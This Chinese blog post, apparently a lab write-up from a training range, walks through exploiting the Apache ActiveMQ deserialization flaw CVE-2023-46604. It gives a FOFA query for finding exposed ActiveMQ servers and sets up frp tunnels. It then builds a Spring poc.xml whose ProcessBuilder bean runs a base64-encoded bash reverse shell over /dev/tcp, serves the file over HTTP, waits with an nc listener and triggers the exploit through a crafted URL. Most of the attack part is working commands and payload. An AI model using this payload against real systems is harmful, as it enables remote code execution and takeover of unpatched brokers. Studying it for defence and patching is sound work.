ActiveMQ 反序列化RCE漏洞(CVE-2023-46604)

已于 2024-07-17 23:51:49 修改
阅读量514 收藏 6
点赞数 11
分类专栏: 漏洞复现 春秋云境 文章标签: activemq 网络安全
于 2024-07-17 23:51:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45240382/article/details/140508571
版权

0x01 前言

在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
影响范围:

  • Apache ActiveMQ 版本 <= 5.18.2

漏洞搜索:

# fofa 语法
app="APACHE-ActiveMQ" && port="61616"

复现准备:

  • 目标靶场:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com:80
  • 公网服务器:10.10.10.1
  • kali 本地虚拟机:127.0.0.1

0x02 复现

由于春秋云境服务器无法访问到本地的内网,所以需要一台公网服务器与本地虚拟机端口进行映射。
公网服务器建立 frps 开启 7000 端口,本地虚拟机启动 frpc,通过更改 frpc.ini 添加两个端口。一个用于本地建立 web 服务可以下载 xml 文件,一个用于目标靶场通过该端口将 shell 反弹到本地虚拟机。

1. 公网服务器启动 frps

# 配置 frps.ini
[common]
bind_port = 7000

# 启动 frps
./frps [-c frps.ini]

2. 本地虚拟机启动 frpc

配置文件:

  • 本地 80 映射公网服务器 22815
  • 本地 4444 映射公网服务器 22816

image.png

# 启动 frpc
./frpc -c frpc.ini

3. 创建 POC 文件

在本地虚拟机中创建空白目录,创建 poc.xml 文件,写入以下内容。

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMjI4MTYgMD4mMQ==}|{base64,-d}|{bash,-i}</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

解密 echo, 后的 base64 加密数据,更改其中的 ip 和 port,重新加密替换。

4. 建立 HTTP 服务器

poc.xml 文件同目录下建立 HTTP 服务器

# 使用 python 在 80 端口建立
python3 -m http.server 80

此时,在本地浏览器中 localhost:80 应看到 poc.xml 文件。

5. 监听端口等待 shell

nc -lvvp 4444

6. 反序列化利用

访问目标靶场,复制 url:

http://xxxxx.cloudeci1.ichunqiu.com:8080/?active=org.example.activemq.service.SayService&name=World

替换 active 为具有漏洞的模块类,name 值为公网服务器 ip :映射本地80的 port 和 xml 文件路径。

http://xxxxx.ichunqiu.com:8080/?active=org.springframework.context.support.ClassPathXmlApplicationContext&name=http://101.43.68.65:22815/poc.xml

image.png

此时,4444 端口监听应返回 shell。

image.png

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

zneVue.
关注
  • 11
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
探索Apache ActiveMQ RCE:一个强大的安全研究工具
gitblog_00069的博客
04-08 1007
探索Apache ActiveMQ RCE:一个强大的安全研究工具 项目地址:https://gitcode.com/sincere9/Apache-ActiveMQ-RCE 在这个数字化的时代,消息中间件是构建高效、可扩展系统的关键组件。Apache ActiveMQ作为一款开源的消息代理,广泛应用于企业级应用中。然而,与所有软件一样,它也可能存在安全隐患。这就是为什么Apache Activ...
[应用安全]之ActiveMQ漏洞利用方法总结
zhang8907xiaoyue的博客
03-22 7228
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实现,尽管JMS 应用介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码
探索Apache ActiveMQ的安全边界:ActiveMQ-RCE工具深度解析
最新发布
gitblog_00081的博客
06-01 695
探索Apache ActiveMQ的安全边界:ActiveMQ-RCE工具深度解析 项目地址:https://gitcode.com/X1r0z/ActiveMQ-RCE 在安全研究与攻防对抗的前沿阵地,每一个新发现的漏洞都是对技术边界的一次挑战。今天,我们聚焦于一个名为ActiveMQ-RCE的开源工具,它专为应对近期曝光的严重安全漏洞CVE-2023-46604而生,是Go语言的杰作。本文将全...
Apache activeMQ漏洞复现
Shanfenglan's blog
12-14 3211
文章目录1. ActiveMQ 反序列化漏洞CVE-2015-5254)2. ActiveMQ任意文件写入漏洞CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 反序列化漏洞CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7629
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
activemq系列漏洞复现
m0_49420271的博客
06-07 2854
vulhub中activemq系列漏洞复现
ActiveMQ反序列化漏洞原理+复现
ChenD的学习笔记
03-09 2215
ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列化的方法进行传递,在这个过程中没有限制可在代理中序列化的类,这时候我们就可以自己构造一份序列化的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞。消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。
记一次ActiveMQ漏洞利用
未完成的歌~的博客
08-25 1121
Apache ActiveMQ 是 Apache 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动,会打开两个端口,61616 是工作端口,消息在这个端口进行传递;8161 是 Web 管理控制台。
Apache ActiveMQ (版本 < 5.18.3) (CVE-2023-46604)RCE修复方案/缓解方案
士心的博客
10-31 3314
CVE-2023-46604
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
反序列化漏洞通常发生在对象从序列化的状态恢复为原来的实例时。在ActiveMQ中,当接收到的消息包含可信赖的Java对象时,这些对象会未经验证地反序列化。如果攻击者能够控制这些对象,他们可以构造恶意的序列化数据,...
ActiveMQ反序列化漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5-src.zip
06-10
ActiveMQ-CPP库3.9.5源代码解析与应用》 ActiveMQ-CPP库是Apache ActiveMQ项目的一部分,它提供了一套C++接口,用于与ActiveMQ消息代理进行通信。这个库允许开发者在C++应用程序中实现高级消息队列协议(AMQP)和...
apache-activemq-5.16.5
12-27
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。 描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...
apache-activemq-5.16.6-bin.zip
12-26
这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本5.16.6的二进制发行版,主要用于在各种环境中部署和运行。 **Apache ActiveMQ核心概念** 1. **消息队列(Message Queue)**: 消息队列是...
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604
0xSec
10-26 8092
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3501
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3343
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 2846
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ反序列化漏洞复现(CVE-2015-5254)
m0_49025459的博客
10-31 951
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成。
activemq Eclipse Jetty 安全漏洞(CVE-2022-2048)
06-03
关于activemq和Eclipse Jetty的安全漏洞CVE-2022-2048,这是一个已经公开的安全漏洞,存在于Activemq和Eclipse Jetty的HTTP2协议实现中。攻击者可以利用此漏洞在目标服务器上执行任意代码或造成拒绝服务攻击。 如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值